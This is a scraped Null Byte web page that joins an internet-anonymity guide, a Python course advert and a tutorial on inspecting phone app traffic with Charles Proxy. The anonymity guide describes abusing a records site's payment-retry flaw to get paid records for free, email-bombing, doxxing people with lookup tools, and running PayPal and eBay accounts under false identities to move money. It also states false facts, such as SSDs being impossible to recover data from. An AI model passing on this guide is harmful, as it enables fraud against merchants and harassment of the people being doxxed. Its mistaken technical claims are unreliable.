To:Hack websites with SQL injectionHow To:Hack Forum Accounts with Password-Stealing PicturesHow To:Beginner's Guide to OWASP Juice Shop, Your Practice Hacking Grounds for the 10 Most Common Web App VulnerabilitiesHow To:Hack Your Kindle Touch to Get It Ready for Homebrew Apps & MoreHow To:SQL Injection Finding Vulnerable Websites..SQL Injection 101:Database & SQL Basics Every Hacker Needs to KnowHIOB:WebSite Hacking Series Part 2: Hacking WebSites Using The DotNetNuke VulnerabilityBecome an Elite Hacker Part 4:Hacking a Website. [Part 1]How To:Use the jQuery Javascript framwork to make websitesHow To:Re-Enable Zoom for Websites That Block It in Safari for Your iPhoneHow To:Use the basics of the jQuery Javascript libraryHow To:Make an animated digital clock for your website using Javascript CSSHow To:Reveal Saved Browser Passwords with JavaScript InjectionsNews:Get YouTube's New Layout Today with a Simple JavaScript HackGoodnight Byte:HackThisSite Walkthrough, Part 9 - Legal Hacker TrainingHow To:Is Your Website Vulnerable to XSS Injections? Here's How to Protect Your VisitorsForbes Exploited:XSS Vulnerabilities Allow Phishers to Hijack Sessions & Steal LoginsGoodnight Byte:HackThisSite Walkthrough, Part 4 - Legal Hacker TrainingHow To:How Cross-Site Scripting (XSS) Attacks Sneak into Unprotected Websites (Plus: How to Block Them)Goodnight Byte:HackThisSite Walkthrough, Part 3 - Legal Hacker TrainingHow To:Spider Web Pages with Nmap for SQLi VulnerabilitiesHow To:JavaScript Codecademy TutorialHow To:How Hackers Steal Your Cash on Trusted Sites & How to Prevent Against ItNews:The Homepage of jQueryHow Null Byte Injections Work:A History of Our NamesakeNews:Fun Way to Learn JavaScript Basics!Goodnight Byte:HackThisSite, Realistic 4 - Real Hacking SimulationsCommunity Byte:HackThisSite Walkthrough, Part 9 - Legal Hacker TrainingHow To:The Essential Newbie's Guide to SQL Injections and Manipulating Data in a MySQL DatabaseHow To:Access Wikipedia During Today's SOPA BlackoutGoodnight Byte:HackThisSite, Realistic 2 - Real Hacking SimulationsHow To:Advanced Social Engineering, Part 2: Hack Google Accounts with a Google Translator ExploitHow To:Noob's Introductory Guide to Hacking: Where to Get Started?News:DCPU PacmanGoogle Dorking:AmIDoinItRite?
How to Remove Your Online Identity: The Ultimate Guide to Anonymity and Security on the Internet Β« Null Byte :: WonderHowTo
Anonymity is something that doesn't exist today. Everything you do in the world is tracked, from the purchases you make to surfing the internetβ€”even taking pictures on your iPhone. Everything you have ever said and done on the internet is still thereβ€”somewhere. This is calledcaching. For example, when a site is down, you can view its cached page on Google.Even if this data was not stored and got deleted, it would have been written on a hard drive, which means it's vulnerable tofile carvinganddata recovery. No matter what you do, something about you will be on the internet. If you buy a house, get married, even if you die, something pertaining to you will reside on the net. The information is in public recordseverywhereand can be found with a simple Google search.Who and What Is This Guide For?This guide is foreveryoneβ€”everyday web users and black hat hackers alike. And it's intended to educate on the importance of practicing anonymity and using security on the internet.Let's face it, trolls exist on the web and we are bound to make one of them angry. This could be the biggest mistake you've ever made. If you have a username that can be Googled and your Facebook page pops up, someone can find out your real name. This can prove to be big trouble for you. A troll can have his cronies and followers allDDoSyou in some form. Spamming your home with phone calls, getting nasty letters, and having your home network directly attacked can be a result of this. Your personal information would be everywhere, causing a huge strain on your life. This is referred to on the internet as ad0x.Everyone is a potential target. But don't worry, there are ways that you can mitigate these chances, or even remove them completely, depending on how much damage you may have inflicted to yourself. This guide is here to teach you how to live a normal life on the internet and operate normally, but stay secure and keep your information and dealings safe from prying eyes. There are a million reasons to want to keep your internet biddings seperate from your real life ones. You have a right to anonymity.How Do I Become Exposed?It depends. If you use the same username and use your real name on any website whatsoever, you can be easily exploited. Here are some habits and activities that are bad ideas when practicing anonymity.Social networking sitesβ€”These reveal all sorts of information. Most commonly, people will list birthdays, post pictures of family, list contact information and phone numbers, and show theirreal name. This is dangerous and sensitive information to make public. Just imagine the people you wouldn't want to possess this information. Social networking sites post this information publicy, and some of you may not even know. This is not the best stuff to have visible to the public.Committing crimesβ€”Not only is commiting crimes wrong, but you end up getting arrested, and that leads to your name in a news article. This makes a huge irreversible footprint on the internet. You will be searchable via many online databases. The bottom line is: try not to divulge in anything illegal.Keeping a blogβ€”If you maintain a personal blog as a journal, you're posting all of your private information for the whole world to see. You may want to re-assess what you are doing. Is a blogreallythat important to the point that you might let strangers know things they shouldn't know about you? Exposing a window this personal into your life is practically begging for a creepy disaster. This should be avoided at all costs for the sake of anonymity.Posting public commentsβ€”Bear in mind when you post to a public board, that comment will be viewable through a search engine. A lot of you post private information publicly, thinking you are safe because you hide behind the usenamehaxx0r9000, but if you use a Facebook with a real name that holds the URLhttps://facebook.com/haxx0r9000, you're pretty much out of luck.Public phone recordsβ€”Having a number reachable just by searching a name is bad news. Stick with prepaid phone services. You can get a Motorola Droid on a prepaid plan, so how can you complain?Making purchases with credit cardsβ€”You can't rely on the security of someone else. For example, say you buy something on an online auction site and store your credit card information there. If someone hacked their network, who knows if the information would be encrypted. All of your personal information, credit card numbers, and even your purchase history would be available to the hacker. Same would hold true if a business didn't shred sensitive paperwork. An alternative would be to withdraw cash from an ATM.Perfect Anonymity from the Ground UpFor perfect anonymity, you will likely need to start over from scratch. We need to take care of our old accounts. Prior to doing so, flood it with inaccurate information. This will ensure that if the information is ever recovered, it will be really hard to determine which data is correct and which isn't.Methods of Flooding and Secure DeletionFill your mail inboxes with mailbombers. This will flood the caches and makes sure the sensitive information is overwritten. Bomb yourself using one of the manyemail bombersaround the internet. They are easy to use.Upload random pictures of other people found on Google. This will make it hard to determine who an account belonged to.Change your information for given accounts to innacurate nonsense. This will also aid in removing the link to you in real life.Delete all Prior Social Networking Sites and AccountsDelete Your Accountis a great site to help delete any major (or minor) scale account that you may own on the internet. You can search alphabetically for sites like Facebook, Reddit, Monster, Hotmail, Google, etc.Adversely, if you feel that you must keep your accounts, it is up to you to delete pictures, videos, comments on others' profiles, etc. to get some degree of anonymity. I would never recommend doing this for someone who wants complete anonymity.If you have residual information left over in Google's cache, as we have stated previously, you can get rid of it by removing it with thisrequest form. It is worth it if you want your anonymity. Once you are sure that your online presence has been deleted and you are ready to start from scratch, proceed.Protecting Your Data & StorageGet a Solid State DriveScrap your hard drive. If we are talking about having perfect anonymity, it's the only way to make sure. An ideal solution would be to use aSolidStateDrive (SSD). SSDs are impervious to file carving and data recovery unlikeHardDriveDisks (HDDs), because SSDs use flash memory. In laymen's terms, bits of the data are not retained after deletion on SSDs, the data is immediately released and gone forever.If You Have to Use a HDD, Use a Virtual MachineOn the other hand, regular hard drives use an actuator arm inside of the hard drive to polarize the platter with a magnetic charge (positive or negative). These translate into the binary1's and0's that create our computers. On a standard hard drive, leftover fragments of files can be easily restored to their previous states.If the price of SSDs are too much for your budget, and you are forced to use a normal hard drive, a trick to keep your operating system from storing any sensitive data is to have a host computer, and then create avirtual machinewithin it. Use that as the actual computer, and if you need to make sure information from your computer can't be recovered,securely deletethe files and they can never be recovered. This is because the data is written over multiple times to damage the ability to read and recover it.Drive and Data EncryptionTo protect yourself locally before you even get on a network, drive encryption is a good idea. Encryption obfuscates data so it is unreadableβ€”unless a passkey is supplied that matches the hash found in the encrypted data's header. When the passkey is entered, the data is decrypted and readable. To learn how to encrypt your hard drive, check out thisNull Byte.Creating and Managing EmailsYou need to create a new email that has nothing associated with you in real life, and nothing to do with your former internet handle, as this could lead to your information being traced to your new identity. Names such as "jparker1983" says a lot about who you are.What if the Email Service Requires a Phone Number to Activate?If the email address you create requires a phone number, as they often do, set up a free forwarding phone atiNumbr. This will allow you to essentiallyhideyour phone number. After you set up an account, iNumbr calls your phone and the target number. It bridges the two calls, effectively masking your phone number.Get into the practice of creating a new email for everything you use, for ultimate anonymity and safety. This will:Prevent single email accounts from being stolen (if, by chance, it ever does happen), which in turn will cause you to lose access to all of your accounts because of it.Keep personal contacts, business contacts and internet only contacts separate. This separates people you know in real life, to people you may not trust enough to mix in with your personal friends or associates.Keep things organized.Allow you to use a test email for sites that may spam you, but require an email address.Creating and Managing Secure PasswordsThis is an internet security must. A good password does not mean creating a string of text that someone else will not think of. There are many things that go into creating a good password. However, not only does creating an algorithmicallystrongpassword matter, but how you manage them also does. Null Byte created aguidea while back on doing just this.Good Requirements for Creating a Strong PasswordGreater than 20 characters.Full use of ASCII characters.Never use the same password twice.Never answer security questions accurately, they just allow another way for an attacker to get in.Make Your Browser Reveal Nothing About YouSet up your browser so it doesn't have auser agent. A user agent identifies your browser and OS to a website via JavaScriptβ€”something that can reveal who you are. So, we should have itspoof this information. Also, you should have a plugin likeNoScript. Alternatively, you could disable JavaScript and Flash. These can leave cookies on your computer that will track which websites you visit.Disable JavaScript and Flash Manually in FirefoxClickPreferences.ClickContent.UncheckJavaScriptand disable it.Use Tor to Mask Your IP Address and Encrypt Your TrafficYou can also use theTor bundleand have a standalone browser that can be securely deleted at any time. It also will encrypt your traffic and mask your IP address (your unique ID on the internet). This makes your traffic unable to be sniffed or searched,even by your ISP. Your IP also becomes safe from people who you don't want seeing it (or whatever reason you want your IP to be hidden for).Please enable JavaScript to watch this video.Secure Traffic from Analysis & Make Anonymous Connections to SitesWe have a few solutions at hand. Encrypting traffic and spoofing our IP protects our identity from websites. This also protects us from people sniffing our traffic when browsing away from home.Spoof Your MAC Address to Make Yourself Anonymous on the NetworkFirst and foremost, you need to spoof your MAC address if you are using a connection away from home. This will make your computers burned-in address spoof to one that you specify. With this in practice, we will be protected from other users on the network, and the router. It will also make sure our MAC address can't be traced back to our person (because if it was bought with anything other than cash or prepaid, they know exactly who you are) . If someone sees your MAC address Windows users can use this guidehere. If you are running Linux, enter the following command in the Terminal:sudo ifconfig wlan0 down && sudo ifconfig hw ether 00:11:22:33:44:55 && sudo ifconfig wlan0 upEncrypt Your Traffic with an SSH Tunnel or a VPNYou need your traffic to be safe fromtraffic analysiswhen using Wi-Fi away from home. The simplest solution is to set up a homeSSH tunnel. This will encrypt, and then forward your traffic back to your home computer before sending it to its destination, which protects it. An alternative solution that can cover all ports on all platforms would be to use aVPN. These anonymizing solutions can also protect you at home when you want to access a website while masking who you are and where you are from. I recommend trying to get Eastern block VPNs from countries like Asia. The United States has no jurisdiction there, thus, logs cannot be obtained.Properly Use Social Networking Sites to Maintain AnonymityIf you are in a circumstance where you absolutelyneedto use social networking sites, there are a number of things that can go wrong, so you will need to be careful. Any social networking site that you own must use fake information to maintain anonymity.Don'ts for Owning a Social Networking SiteDo not use real information of any kind. No names, no address, no anything.Do not upload real pictures of yourself (or do as I do, use anobfuscatedpicture of yourself. However, do not include your nose and eyes together, that triangular area on your face is what makes a brain recognize a face easily).Do not talk to strangers. Only talk to family and personal friends who know you and your alias. A stranger that you confide in could wind up leaking your information.Do not post in public comments.Do not display a phone number.Do not display your email.Do not let Twitter or anything else expose your location. Make it a habit to check application settings to make sure it isn't posting information of yours anywhere without your permission.How can I Test my Anonymity?There are a number of free services that exist on the internet for you to use at your disposal to aid you in getting personal information on yourself, or others. Even when you have only a little to begin with, you can get a full d0x on someone.Piplis a search engine that searches non-indexed web pages, as well as indexed, for common usernames, email addresses, phone numbersβ€”even name and location. This is an immensely useful tool. You can look a person up via email, name, number, or other information.Tineyeis an advanced, reverse-image lookup tool, whereby you can take an image on the internet, then find sites that have the same image in it. A helpful tool, if you weren't getting anywhere with a d0x. If the person uses different usernames, has a fake name on their facebook, and sets it to private, you can take their default picture, and find other sites that the picture is on. Since people most commonly use the same default profile picture, you will likely end up with another social networking site, that can perhaps reveal more information.Archives(Disclaimer: This is probably frowned upon). This little gem of a site is one I found that's got quite the interesting flaw. They have real records of peoples' employers, phone numbers, previous residences, family trees (even kids), arrest records, newpaper articles that the person has been mentioned in, and more. This is a PAID service. But don't be alarmed, I said it had a flaw.Exploit Archives Purchasable ServicesGo down to a gas station or Walmart, and buy a prepaid debit card, spend the money on something you actually want.Make an account on Archives (use a new spam email, they send boatloads of the stuff). Search the user and buy records of choice. Even if you have no money on the card, the transaction goes through and they give you the records. The website has a mechanism that retries a card number if the transaction fails, and gives it about 30 minutes. So you can go nuts for a little while and "buy" what you need. It's a great little glitch, but after that, they ban the card from use on the site (this was personally found and tested by me.)Before You Enter a Phone Number OnlineIf you need to use your phone number online for business orCraigslistads and such, you have a couple pretty good options available to you. My favorite option is to useGoogle Voice. With Google Voice, you can operate even better than before.Features of the Google Voice AppYou can:Forward calls to your home phone.Make calls with your home phone appear to come from your Google Voice number.Archive logs.Text message.Ability to change your phone number and infinite amount of times.Make Sure Your Smartphone Doesn't Betray YouDon't worry, you can keep it. You do need to make surelocationoptions are turned off, though. By default, I know the iTouch stores your GPS location on every picture you take. If this were ever on the internet, you could examine it in hexadecimal to find the coordinates.Windows file explorer even supports reading the GPS location in its properties view.If you don't want anyone reading data passed through on your phone, you might want to get rid of your phone completely. iOS and Droid have been proven to track everything you do. They can even expose data when on an HTTPS connection.Please enable JavaScript to watch this video.How to Spend Your Money AnonymouslyThis can also be done! Anonymous spending isn't as hard as you would think. To spend anonymously online, we first must purchase a prepaid debit card and activate it. They can be found at any gas station or supermarket.Care dos andDuring activiationDO NOTenter your social security number.Pay for the card incash.Do not register the card with any of your real information, such as address and name.For added anonymity, you may want to useTorto anonymize your traffic and spending accounts, not justwhois spending the money.Spending Money on the InternetOpen up a PayPal account with a fake name, address, etc. Make its information match the fake stuff that you entered when registering the debit card.Create aneBayaccount with the same information. This will be your spending and receiving account.Purchase something on eBay with your new PayPal account, and have it shipped to a friend's house under your fake name (to avoid the question being asked, packages are delivered according to address, not name).Receiving Money on the InternetSell something on your fake PayPal account.After you receive payment and mail the goods, have yourrealPayPal and eBay accounts post an ad for apiece of paper.Sell the paper for the amount of money the goods were sold for to your fake account. This allows for a nice, natural-looking transfer. Anonymous.Protecting Yourself from Social EngineeringEventually, someone will want to find out more information about you. Means such associal engineeringcan give this "someone" the information about you that they want. A person may contact you directly or go through your friends and social engineer them. The below list of rules should be held onto with your dear life.Try not to Talk to StrangersYour first concern on the internet shouldnotbe to make friends. Having online friends is a security risk that I do not advise taking. Also, how do you know that you can trust them in the first place? Only do this if it is amust. Remember, it is yourownfault if you don't cover your own back!Don't Divulge Personal InformationDon't give any real information, such as location, DOB, names, etc. Give legitimate sounding info. Come up with your ownnewlife story and this will keep people from accurately searching for you. Skilled d0xers and social engineers like myself can find out who you are just as easy as if you plastered your name and social security number on the front of your house. This is a big technicalno-no.Change Your Speech PatternsI have d0xed people many times just by analyzing speech patterns and common phrases used by them. Do not underestimate the power of psychology or deductive reasoning skills. Some people possess them, so it is safe to never assume that you are too lucky to fall victim to it.In ClosingFollow this guide to the bone and you should never have to worry about your anonymity on the internet. You become a ghost, free to do as you like, without anybody telling you not to. If you found this guide useful, please, send it to your friends to help others become anonymous.Null Byte members are available for chat and discussion via theforumsandIRC. Follow the Null ByteTwitterandGoogle+for the latest updates.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicensePhoto byBen FredericsonRelatedHow To:Inside Bitcoin - Part 1 - Bitcoin and AnonymityTor for Android:How to Stay Anonymous on Your PhoneHow To:Secure Your Identity & Become Anonymous Online in 2019How To:Easily Tweak, Mod, & Customize Windows 10How To:Prevent someone from stealing your identityApple Pay Cash 101:How to Verify Your Identity with AppleHow To:Break into the Lucrative World of Ethical Hacking with This Reasonably Priced Course BundleHow To:Access the Dark Web While Staying Anonymous with TorHow To:Buy Bitcoin Anonymously β€” A Guide to Investing in Cryptocurrency While Maintaining PrivacyHow To:15 Million T-Mobile Customers Hackedβ€”Here's How to Protect Yourself from Identity TheftHow To:The Best Bitcoin Wallet Apps for Your Android DeviceHow To:Is Tor Broken? How the NSA Is Working to De-Anonymize You When Browsing the Deep WebHack Like a Pro:How to Keep Your Internet Traffic Private from AnyoneHow To:With the Silk Road Bust, the Online Black Market Already Has a New HomeHow To:Secure and verify data on a GNU/Linux box with GnuPGNews:Should Google+ Require You to Use Your Real Name?How To:Chain Proxies to Mask Your IP Address and Remain Anonymous on the WebHow To:Securely & Anonymously Spend Money OnlineNews:Anonymity Networks. Don't use one, use all of them!News:Anonymity, Darknets and Staying Out of Federal Custody, Part One: Deep WebHow To:Chrome Shares Your Activity with Google - Here's How to Use Comodo Dragon to Block ItHow To:Use Tortunnel to Quickly Encrypt Internet TrafficNews:Obama and Congress Approve Resolution that Supports UN Internet TakeoverNews:Security Flaw in HTC Smartphones Leaks Your Personal Data to Certain Android AppsTor vs. I2P:The Great Onion DebateNews:Anonymity, Darknets and Staying Out of Federal Custody, Part Three: Hidden ServicesHow To:Create a Fake Online Identity for Website Registrations in Just One ClickHow To:Secure Your Computer with Norton DNSHow To:Permanently Erase Data So That It Cannot be RecoveredNews:Homeland Security is watching YOUHow To:Your Ultimate All-Nighter Survival GuideHow To:Get the 'No Photos' Trophy in Payday: The HeistNews:STANDP'S TOP LIST OF GREATEST SOFTWARES HE USES *NOW* & ALWAYS...How To:Noob's Introductory Guide to Hacking: Where to Get Started?Lockdown:The InfoSecurity Guide to Securing Your Computer, Part IIThe Ultimate Guide:Diagnosing & Fixing Connection Issues, Part IIPlaces to Stay:Japanese Internet Cafes | Photo Guide
This Python Bundle Can Teach You Everything You Need to Know Β« Null Byte :: WonderHowTo
Python is one of the most commonly used programming languages in the world. From data science to game design, Python appears in almost every industry that requires coding of some kind. If you're looking to get into or get promoted to a higher level in one of those industries, then your next step is to learn this versatile programming language.The 2021 Premium Python Certification Bootcamp Bundlecan be your guide from Python beginner to master, and it is currently on sale for $34.99.Whether you're looking at game design or app building, The 2021 Premium Python Certification Bootcamp Bundle has a class suited for your ambition. With 13 different courses covering over 500 lessons, ranging from "Ethical Hacking Using Python from A to Z" to "Artificial Intelligence (AI) in Python," you will find a course that covers the interests you already have β€” and many more that will broaden your professional knowledge. Each course is taught by an expert who has used Python professionally for years, including Dr. Minerva Sing, a graduate from Cambridge University specializing in Tropical Ecology and data science.With your purchase, you will get lifetime access to 41 hours of lessons that can be useful to you throughout your career, giving you the knowledge to use and a starting point for continuing your studies. With such a difficult subject, you'll want all the time you can get to immerse yourself in Python and learn all the ways it can move your career forward.Get The 2021 Premium Python Certification Bootcamp Bundlefor $34.99, on sale for 98% off from its regular price of $2585.Prices subject to change.Don't Miss Out:The 2021 Premium Python Certification Bootcamp Bundle for Just $34.99Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:This Extensive Python Training Is Under $40 TodayHow To:Become an In-Demand Web Developer with This $29 TrainingHow To:Break into the Lucrative World of Ethical Hacking with This Reasonably Priced Course BundleHow To:This 5-Course Data Analytics Bundle Is Just $49 TodayHow To:Practice Using Essential Tools of the IT Trade with This Value BundleHow To:Master Python, Django, Git & GitHub with This BundleHow To:Here's Why You Need to Add Python to Your Hacking & Programming ArsenalHow To:Learn the Most Widely Used Programming Language for $35How To:Expand Your Coding Skill Set with This 10-Course Training BundleHow To:Become a Master Problem Solver by Learning Data Analytics at HomeHow To:You Can Learn the Data Science Essentials at Home in Just 14 HoursDeal Alert:Learn to Code for Only $39 While You're Stuck at HomeHow To:Learn to Code Your Own Games with This Hands-on BundleHow To:Learn Python Today with This Discount BundleHow To:Master Python with This Top-Rated Bundle for Just $30How To:This $1,300 Ethical Hacking Bundle Is on Sale for $40 TodayHow To:Become a Big Data Expert with This 10-Course BundleHow To:Expand Your Coding Skill Set by Learning How to Build Games in UnityHow To:Tackle Python & AI with This Extensive Training PackageNews:You Can Master Adobe's Hottest Tools from Home for Only $34How To:Master Python, Linux & More with This Training BundleHow To:Learn the Essentials of Accounting to Boost Profit Margins in Your Small BusinessHow To:Become a Productivity Master with Google Apps ScriptHow To:Get Project Manager Certifications with Help from Scrum, Agile & PMPHow To:Become Fluent in This Dynamic Programming Language for $30How To:The Novice Guide to Teaching Yourself How to Program (Learning Resources Included)How To:Design Your Own Video Games with This Pay What You Want BundleNews:Now's the Perfect Time to Brush Up on Your Excel SkillsHow To:Learn to Draw Like a Pro for Under $40How To:Become an In-Demand IT Pro with This Cisco TrainingHow To:Convert Python Script to ExeNews:Learning Python 3.x as I go (Last Updated 6/72012)Weekend Homework:How to Become a Null Byte ContributorNews:Null Byte Is Calling for Contributors!Weekend Homework:How to Become a Null Byte Contributor (1/29/2012)Farewell Byte:Goodbye Alex, Welcome AllenNews:FarmVille Orchards and Tree MasteryWeekend Homework:How to Become a Null Byte Contributor (1/12/2012)Weekend Homework:How to Become a Null Byte Contributor (2/17/2012)News:The Humble Bundle Strikes Again with a "Frozen" Theme
How to Use Charles Proxy to View the Data Your Mobile Apps Send & Receive Β« Null Byte :: WonderHowTo
If you're using a mobile device, it's a pretty safe bet that your apps are sending lots of information back and forth from their servers. To make sure there is no inappropriate data collection going on, it's worth setting up a web proxy to spy on this traffic, so you know exactly which apps are "phoning home" and when.With a web proxy established, you can sniff out everything that's being sent and received by your Android or iOS apps. You can even monitor any encrypted traffic being sent over HTTPS. The web proxy acts as a man-in-the-middle, letting you see everything that's going on, giving you an idea of what apps should be uninstalled.After all, there's no limit to the type of data collection that might be happening. Everything from seeing how long you spend on a specific screen to raw sensor data is frequently collected, either for companies to analyze internally or sell to third parties. Some of this info you may not want them having or selling.Don't Miss:How to Spy on Anyone's Smartphone Activity Like Mr. RobotStep 1: Install Charles Proxy on Your ComputerMy preferred tool for analyzing HTTP traffic isCharles Proxy. It's available for all modern operating systems (Linux, macOS, Windows), and you can download a free 30-day trial atcharlesproxy.com/download. After the trial is up, you can expect topay $50 for a user license.Charles is an immensely powerful tool, not only for sniffing app traffic but for all kinds of analysis and debugging of web applications, so it's a good investment if you're into mobile development of any kind. If you're just wanting to see what's going on with the apps on your smartphone or tablet, the free trial will be sufficient. Just note that the free trial islimited to 30-minute sessions, so you'll have to close and restart Charles whenever 30 minutes is up.After downloading the MSI, DMG, or TAR.GZ file, open it up and follow the instructions to install Charles like you would any other app you install from a compressed file.Don't Miss:Open Third-Party Apps from Unidentified Developers in macOSStep 2: Open Up Charles Proxy to Start a SessionAfter installing Charles, open it up. If you're running macOS (previously Mac OS X), you'll need to grant permissions for the Charles Proxy Settings app to modify your network settings to function properly. You can do this later, but it's easier to just "Grant Privileges" now. You'll need to enter your password to continue.On a Windows system, you'll need to "Allow access" on theWindows Security Alertthat pops up. Just keep everything as seen below (keep "Private" checked, "Public" unchecked). You may or may not have to enter your password to continue.When Charles starts, it immediately begins recording a session. Initially, you'll just see traffic on your local machine. You can expand a hostname to see detail about each HTTP request; There are panels to inspect headers, cookies, JSON, and form data.You might notice that information isn't available for hosts using HTTPS; This is because HTTPS traffic uses a cryptographic protocol called Transport Layer Security to encrypt data between servers and users. Fortunately, Charles provides us with the capability to install and trust a root certificate, unique to each installation, that will let us see HTTPS data in plaintext.Step 3: Find Your Computer's IP Address & Port NumberInstructions for configuring your desktop browser and operating system to route traffic through Charles vary depending on what you're using. If you want to use Charles to inspect web traffic from your browser, I would recommend visitingthis Charles documentationon the topic.For our purposes, we want to inspect traffic coming from a smartphone, so we'll start by configuring an iPhone to use the computer running Charles as a web proxy.First, on the computer running Charles, select "Help" from the menu, then "SSL Proxying," and click on "Install Charles Root Certificate on a Mobile Device or Remote Browser."You'll see a dialog like this one that provides an IP address and port for the machine running Charles:Step 4: Configure Your Phone to Use Charles ProxyOn an iPhone, navigate to "Wi-Fi" in the Settings app, then make sure it's on the same network as Charles. Tap the info icon next to the connected network, then scroll to the bottom and select "Configure Proxy." Select the row for "Manual," and enter the server and port numbers from the last dialog Charles gave you. Tap "Save" to finish.Don't Miss:How to Track ADS-B Equipped Aircraft on Your SmartphoneFor Android phones, the process differs slightly depending on the OEM and software version. Generally, you would open up the Wi-Fi settings, tap-and-hold on the shared network, then select something like "Manage network settings" or "Modify network" or a pencil icon. Select the option to show advanced settings, then open the "Proxy" settings and manually enter the server and port numbers that Charles gave you before. Make sure to tap "Save" to finish up.Your smartphone is now configured to route HTTP traffic through Charles.Step 5: Allow the Connection to CharlesWhen your smartphone is connected to Charles, you'll get a dialog on your computer alerting you that Charles has received an attempt to connect. Select "Allow" now. If you deny it, instead, you'll need to restart Charles to get the prompt again.Step 6: Install the Root Certificate on Your PhoneNext, using the web browser on your smartphone, navigate tochls.pro/ssl.On an iPhone, you'll immediately get a prompt asking to allow the site to show you a configuration profile. Tap "Allow." After that, you'll be brought to theInstall Profilescreen for the Charles Proxy CA. Tap "Install," which will bring you to a warning page. Tap "Install" again, and yet again on the popup. Lastly, tap "Done" to finish up.If you're on iOS 10 or above, you'll also have to visit "General" in the Settings app. Tap "About," then "Certificate Trust Settings" at the bottom. Under theEnable Full Trust for Root Certificatessection, tap the toggled next to the Charles Proxy CA.On an Android device, the file should immediately try to download on your device. If it doesn't, you may get a prompt asking to download it, in which case you'd hit "Download." After downloading, you will have to enter in your PIN or fingerprint in order to continue. Then, the certificate window will pop up, where you'll want to name the certificate something like "Charles Proxy CA." Hit "OK" when finished.Note that you will need to have ay DNS-based ad-blockers disabled on your Android device in order to install the certificate from Charles Proxy. Also, later on when analyzing the data, having your ad-blocker turned on again will only mask the traffic, so it's best to keep it off until you're down using Charles.Now that you have the certificate installed, you can see encrypted HTTPS data in plaintext in Charles, not just HTTP data like without the certificate.Step 7: Enable SSL Proxying for All Hosts in CharlesYou're not done just yet. There's one more step before viewing all the data coming and going from apps. You'll need to configure Charles to enable SSL proxying for all hosts. Navigate to "Proxy" in the menu, then select "SSL Proxying Settings."When the options come up, hit the "Add" button in the "SSL Proxying" tab. When theEdit Locationbox appears, just hit "OK" or manually enter * (a single asterisk) into theHostfield and hit "OK." This is a wildcard character that will apply to all hosts. Leaving theHostfield blank will create a wildcard for you.Make sure to hit "OK" in theSSL Proxying Settingswindow to save your settings. And now that you're all set up, open an app on your smartphone to see what kind of data they're sending!Step 8: Isolate the Phone Traffic from Other DevicesDepending on what kind of web traffic is being generated on the machine running Charles, it can be hard to tell what requests are coming from a phone or not. Charles automatically modifies your network settings to route HTTP traffic on your computer through the proxy, but it's pretty simple to change that manually so you only see phone traffic.Don't Miss:Log Wi-Fi Probe Requests from Smartphones with ProbemonIn macOS, you can change this in "System Preferences." Once there, navigate to "Network," then "Advanced," and under the "Proxies" tab, uncheck the boxes for "Web Proxy (HTTP)" and "Secure Web Proxy (HTTPS)." Charles will automatically change this setting every time it starts up again, so you'll need to repeat this step every time you want to isolate phone traffic.On a Windows setup, you'll need to open up your "Settings." Next, select "Network & Internet," then "Proxy." When there, scroll down toManual proxy setup, then toggle off the "Use a proxy server" switch. Unlike with Macs, you will not need to do this each time after restarting Charles.Step 9: Use Your Apps & Analyze the ResultsI chose to test this on something I use pretty often, Strava, a fitness-tracking app that lets users record and upload data for workouts. When I open Strava on my smartphone, I see a number of hostnames, i.e., domains, populate in the left panel in Charles.By expanding these and inspecting in the "Contents" panel on the right, you can see exactly what information these apps are sending to manufacturers and third parties. I recognized one of the entries for Strava as a commonly used analytics platform and decided to check it out.I'm not naΓ―ve enough to post the entire payload, but there was some really detailed info that I found in here, including my name, location, wireless carrier, email address, and even some advertising categories that it had placed me in. This isn't very surprising, knowing how much info these apps can harvest, but it was interesting to see it all laid out in plaintext.Keep an eye out for requests to known app analytics companies. A few of the more popular ones include Segment, Fabric, Flurry, and Firebase. Ad providers also receive a pretty creepy volume of tracking data and can be a good place to look as well β€” you can often tell what these are by the hostname.For the most part, the data being sent and received by apps is usually innocuous. Anything going to an address that looks like api.appname.com, for example, tends to be functional data needed for the app to work. Looking into these requests can give you a good behind-the-scenes look at how the app works, and it's a good place to look to make sure it's not "phoning home" with data you don't expect it to be accessing.Can't Get Some Apps to Work on Your Phone?A lot of apps implement SSL certificate pinning, meaning they specifically validate the root certificate and won't be susceptible to a man-in-the-middle attack like this. In my case, the actual Strava API validates certificates, but the third parties receiving my information did not.If you try using an app on your phone and it won't load or work properly, it likely implements SSL certificate pinning, so you won't be able to see any of the web traffic for it. A lot of apps from Apple and Google have this level of security baked in, so third-party apps are the ones you'll want to try out β€” they're the ones more likely to be doing shady things with your data anyway.Removing Everything Once You're DoneOnce you're done analyzing the mobile app traffic on your smartphone, you should remove the installed certificate as you wouldn't want your man-in-the-middle certificate to stay on your device any longer than you need it there while you're explicitly using it. You may also want to remove the proxy setup.On an iPhone, to delete the certificate, go to "General" in Settings, then select "Profile" near the bottom. Tap the "Charles Proxy CA" configuration profile, then hit "Remove Profile." Tap "Remove" to confirm. To stop the proxy server, select "Wi-Fi" in Settings, tap on the Wi-Fi network, select "Configure Proxy," then turn it "Off" and hit "Save."For all of you Android users, the process will differ depending on your device. Select "Security & location" or "Lock screen and security" from Settings, tap "Advanced" or "Other security settings," then "Encryption & credentials" or "View security certificates." On stock Android, you will also have to tap "Trusted credentials." Now, select the "User" tab, then tap on the "Charles Proxy CA." Tap "Remove," then "OK" to delete it. As for the proxy, just go back into the options for the Wi-Fi network and change the proxy settings from "Manual" to "None."Don't Miss:Turn Any Phone into a Hacking Super Weapon with the SonicFollow Null Byte onTwitter,Flipboard, andYouTubeFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the 